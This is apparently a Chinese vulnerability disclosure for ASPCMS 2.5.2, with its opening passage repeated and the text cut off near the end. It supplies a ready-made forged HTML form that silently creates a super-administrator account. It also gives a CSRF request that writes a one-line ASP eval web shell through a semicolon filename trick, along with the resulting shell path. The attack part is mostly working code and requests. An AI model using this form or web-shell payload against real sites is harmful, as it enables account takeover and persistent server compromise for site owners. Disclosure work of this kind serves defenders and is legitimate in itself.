### 简要描述: ~~ ### 详细说明: ASPCMS最新版2.5.2 CSRF添加管理员: 后台添加管理员的请求如下: 链接:http://10.65.203.100:90/admin_aspcms/_user/_Admin/AspCms_AdminAdd.asp?action=add POST:GroupID=1&LoginName=111111&Password=111111&AdminDesc=111111&UserStatus=1 可以看到没有防御CSRF 我们构造伪造表单: ``` <FORM name="form" action="http://10.65.203.100:90/admin_aspcms/_user/_Admin/AspCms_AdminAdd.asp?action=add" method="post" > <TD align=middle width=100 height=30>管理员组</TD> <select name="GroupID" id="GroupID"> <option value="1" >超级管理员组</option> <option value="6" >lpyuan</option> <option value="5" >普通管理员</option> </select> <TD align=middle width=100 height=30>管理员名称</TD> <INPUT class="input" style="FONT-SIZE: 12px; WIDTH: 300px" maxLength="200" name="LoginName"/> <TD align=middle width=100 height=30>管理员密码</TD> <INPUT type="Password" class="input" style="FONT-SIZE: 12px; WIDTH: 300px" maxLength="200" name="Password"/> <TD align=middle width=100 height=30>管理员描述</TD> <INPUT class="input" style="FONT-SIZE: 12px; WIDTH: 300px" maxLength="200"...
### 简要描述: ~~ ### 详细说明: ASPCMS最新版2.5.2 CSRF添加管理员: 后台添加管理员的请求如下: 链接:http://10.65.203.100:90/admin_aspcms/_user/_Admin/AspCms_AdminAdd.asp?action=add POST:GroupID=1&LoginName=111111&Password=111111&AdminDesc=111111&UserStatus=1 可以看到没有防御CSRF 我们构造伪造表单: ``` <FORM name="form" action="http://10.65.203.100:90/admin_aspcms/_user/_Admin/AspCms_AdminAdd.asp?action=add" method="post" > <TD align=middle width=100 height=30>管理员组</TD> <select name="GroupID" id="GroupID"> <option value="1" >超级管理员组</option> <option value="6" >lpyuan</option> <option value="5" >普通管理员</option> </select> <TD align=middle width=100 height=30>管理员名称</TD> <INPUT class="input" style="FONT-SIZE: 12px; WIDTH: 300px" maxLength="200" name="LoginName"/> <TD align=middle width=100 height=30>管理员密码</TD> <INPUT type="Password" class="input" style="FONT-SIZE: 12px; WIDTH: 300px" maxLength="200" name="Password"/> <TD align=middle width=100 height=30>管理员描述</TD> <INPUT class="input" style="FONT-SIZE: 12px; WIDTH: 300px" maxLength="200" name="AdminDesc"/> <TD align=middle width=100 height=30>状态</TD> <INPUT class="checkbox" type="checkbox" name="UserStatus" checked="checked" value="1"/> <INPUT class="button" type="submit" value="添加" /> </FORM> ``` 漏洞利用之前: [<img src="https://images.seebug.org/upload/201405/130921512b032fc833cb26fdccbf3e0205edef23.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/130921512b032fc833cb26fdccbf3e0205edef23.png) [<img src="https://images.seebug.org/upload/201405/1309220399f557ab97cc08361f5e8ba1fa911e28.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1309220399f557ab97cc08361f5e8ba1fa911e28.png) CSRF添加管理员的过程: [<img src="https://images.seebug.org/upload/201405/13092226a8636103858bf4dc95b81ad37675ece1.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/13092226a8636103858bf4dc95b81ad37675ece1.png) 未作任何验证,成功添加管理员,来看看添加结果: [<img src="https://images.seebug.org/upload/201405/1309225002acc4d2e4a2126949d7c33bffdefd9a.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1309225002acc4d2e4a2126949d7c33bffdefd9a.png) CSRF直接GetShell: 后台编辑模板时,发送请求如下,我们可以添加模板的filename和filetext: http://10.65.203.100:90/admin_aspcms/_style/AspCms_TemplateAdd.asp?acttype=html&action=add filename=111111.asp;111111.html&filetext=%3C%25eval%20request%28%5C%27wooyun%5C%27%29%25%3E 再此过程中也没有做任何验证,而且对添加模板的文件名也没有严格处理,导致CSRF直接获取webshell: [<img src="https://images.seebug.org/upload/201405/1309284719fe8a38871224f774fd8e0292d9fe1c.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1309284719fe8a38871224f774fd8e0292d9fe1c.png) shell地址为: http://10.65.203.100:90//Templates/cn2014/html/111111.asp;111111.html ### 漏洞证明: 将详细说明